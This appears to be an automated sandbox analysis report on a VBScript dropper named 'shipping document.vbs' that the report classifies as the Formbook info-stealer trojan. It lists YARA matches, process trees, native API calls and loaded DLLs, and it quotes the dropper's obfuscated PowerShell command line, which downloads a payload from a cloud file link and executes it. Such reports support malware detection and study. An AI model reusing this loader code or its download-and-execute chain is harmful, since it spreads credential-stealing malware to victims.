        Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.41.14:443 -> 192.168.2.9:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.9:49716 version: TLS 1.2

        E-Banking Fraud

        Source: Yara matchFile source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

        System Summary

        Source: amsi32_5852.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 5852, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Initial file: Forbrugerprises.ShellExecute Investeringsrammens,Kommunikere,"","" ,Arbejdsanvisning
        Source: shipping document.vbsStatic file information: Suspicious name
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6558
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 6558
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::EnumKey
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Ricki = 1;$Gehenna='Substrin';$Gehenna+='g';Function Quillaia($Overbevokser){$Feasibilities=$Overbevokser.Length-$Ricki;For($Kompeni=5; $Kompeni -lt $Feasibilities; $Kompeni+=(6)){$Fortrnelse+=$Overbevokser.$Gehenna.Invoke($Kompeni, $Ricki);}$Fortrnelse;}function Standglas249($Babbittess){. ($Uti) ($Babbittess);}$Usheen=Quillaia ' S.bcM Autoo,roomzA,uatiPreenlUdspil emieaM.cov/Toakt5Ethno. Org,0Kille Het,r(EgetfW SelviNedrunSt nidva.ieogunvaw Brugsisbje propeNTidsfTAgter Stdta1Scale0Ma em.Spu.g0Rensn;A ver B,dedWUrpr,iWoundn Sprn6Hex n4Sub,e; c.to Az.mexSvine6k evr4 Non.;Perso Viruera,tndv Han,:Store1 horo2F ret1 oeme. opti0Inten)Skerr ForkrGSept,eSelebc histkLe,lio As,r/ Inhe2Tailz0Efter1.ndos0.euro0Overb1Bund 0,arav1Ore,t OperFL.udai SprurSto,ve,traafSlavio,earax .hot/ Udsu1 Eger2 Me.l1Krabd.Spinu0Maedt ';$Bogholdersker=Quillaia 'ForbiUOscilsadr.seGangwrBevat- h,ldATheurgPi kyeSemidnKrilrt Ly p ';$Fint=Quillaia 'NondihBlockt ReintEtmaapInsers Indf:Inter/defo /T pvodFryserUn aciTilb vSysseeExecr.Kurs gberr oAdfrdo Loo.gInconlAf aleGabes. 
.lotc Ant o SuccmGodhj/TermouMoun.cTermo?maletefo,grxNo.cupInconoCensur.ejebtBarra=apraxd pulvocohenwHan.knHol bl I.froCaseaaHyr,sdPol r&Ar,npiTrichdBestr= Gar,1Unmo oArbejD FugtjLsead9Univei Po,c8SubbabFilat8 egngBrnefDFu,le7Adspu4BordvVAr.hdU ockac.abenOGamel_Samme0Tiltrm PaynAArb.taF.rreRSkulkxUnmusSVildfOAn,ipZSmithj KorrE l,efISu.pkNU derBNucul5 Burm ';$Observandernes=Quillaia ' Gna >Stand ';$Uti=Quillaia 'DialaiM,ddeePr.dexNonex ';$Akkumulerede = Quillaia 'SkaffeNar,ocDatamhCathoou,ali Fanem%MedisaRetsgpAlligpEjersd ,maaaIndsttKomb a Meta%U,all\ LoenFWagneiTraktnTys,li PillnGinesd forssisoagt El viOve slFrilslArsh,iRetran KursgTeksteProkurUnifan Prece,eklasUd,ap1Wa,py1B tte9 Dext.ArikoU outpnAfkaliIdeal Ne,tb&F,rbi&Flamm ozaeeFiresc St,chfiguro lede Illog$Ulovm ';Standglas249 (Quillaia ' Cent$Amidog .luklY,ereogarnibRetrtaN,nirlUdate:org.nR echrerekinsPreapiKonjagHe nenMa.emeHogmorSlagte,appanpomeld.senseEgn,rsIn,ri=Ndraa( NatucF,jtimKunstd Bvre kants/ Un,oc Fic, Yemen$ Stv,AKravekTnneskKombiuFidusmlejrsuCardiltrykkeMinj rAccoueSkrivd doupeAroma)Pal,o ');Standglas249 (Quillaia ' Mask$Admirg R.shlQuarto Unrib S.deaDansel Fork: NummPReachrGlazef M.llaValgrbDiphtrGenkeiL.viskUnseneVugger,rnne=Learn$JernbFChalliKhevznUdsigtSkull. HressWolffp Un,rl UbndiStjertMa,ri(Tapet$Do,laORringb Ge,ts.nasseAk,usrRvhulvPanoraYnglen RecldFremfeZernerPsychn almueU.loosDispe)Ermel ');$Fint=$Prfabriker[0];Standglas249 (Quillaia ' Akti$actingUnderlJackpo Fidgb OptiaP mphl Pira: baanR Mde.eHejrepTilsla Lejei SkelnOve,dtuncomeCasanrderivsEti.l=FlskeNVo ubenoncuw Ho n- MethOVoldgbEf erjThyr,esen ocBin.itExtra S.cerS Egnsy Ide,sforkatHyrevemot vmchaut. UdslNBro zeHollytJuv l.GvestW ecome BrofbunlooCIncarl UdbyiFreere,aglynSpdbrtUdvik ');Standglas249 (Quillaia 'Psal.$,avshR .krieProtopTerroaCoyotiMovabnBej,st p
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202535C0 NtCreateMutant,LdrInitializeThunk
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252C70 NtFreeVirtualMemory,LdrInitializeThunk
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252DF0 NtQuerySystemInformation,LdrInitializeThunk
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253010 NtOpenDirectoryObject
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253090 NtSetValueKey
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20254340 NtSetContextThread
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20254650 NtSuspendThread
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_202539B0 NtGetContextThread
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252AB0 NtWaitForSingleObject
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252AF0 NtWriteFile
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252AD0 NtReadFile
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252B60 NtClose
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252BA0 NtEnumerateValueKey
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252B80 NtQueryInformationFile
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252BE0 NtQueryValueKey
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252BF0 NtAllocateVirtualMemory
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252C00 NtQueryInformationProcess
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252C60 NtCreateKey
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252CA0 NtQueryInformationToken
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252CF0 NtOpenProcess
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252CC0 NtQueryVirtualMemory
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252D30 NtUnmapViewOfSection
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252D00 NtSetInformationFile
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253D10 NtOpenProcessToken
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252D10 NtMapViewOfSection
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20253D70 NtOpenThread
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252DB0 NtEnumerateKey
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252DD0 NtDelayExecution
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252E30 NtWriteVirtualMemory
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252EA0 NtAdjustPrivilegesToken
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252E80 NtReadVirtualMemory
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252EE0 NtQueueApcThread
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252F30 NtCreateSection
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252F60 NtCreateProcessEx
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252FA0 NtQuerySection
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252FB0 NtResumeThread
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252F90 NtProtectVirtualMemory
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_20252FE0 NtCreateFile
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 20255130 appears 36 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 20267E54 appears 87 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2028EA12 appears 84 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2029F290 appears 105 times
        Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2020B970 appears 266 times
        Source: shipping document.vbs Initial sample: Strings found which are bigger than 50
        Source: amsi32_5852.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 00000011.00000002.2753491610.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2249406825.00000000026D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000012.00000002.2755502958.0000000002150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.2265395528.0000000021930000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000010.00000002.2754713283.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.2753361689.0000000003280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000011.00000002.2752855309.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: powershell.exe PID: 6856, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 5852, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBS@22/10@6/4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Finindstillingernes119.Uni
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ztt1tkp.iey.ps1
        Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\shipping document.vbs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6856
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=5852
        Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: shipping document.vbs ReversingLabs: Detection: 31%
        Source: shipping document.vbs Virustotal: Detection: 40%
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" (the same obfuscated command line that wscript.exe passed to the 64-bit powershell.exe)
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Finindstillingernes119.Uni && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe, Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
        Source: unknown, Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: unknown, Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Windows\SysWOW64\openfiles.exe, Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: unknown, Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\wscript.exe, Section loaded: version.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: gpapi.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: cryptnet.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: winnsi.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: winhttp.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: mswsock.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: webio.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: dnsapi.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: cabinet.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: pcacli.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe, Section loaded: sfc_os.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: fastprox.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: ncobjapi.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: userenv.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: sspicli.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: ntmarta.dll
        Source: C:\Windows\System32\wbem\WmiPrvSE.exe, Section loaded: esscli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: dnsapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winnsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wbemcomn.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: napinsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: pnrpnsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshbth.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: nlaapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winrnr.dll
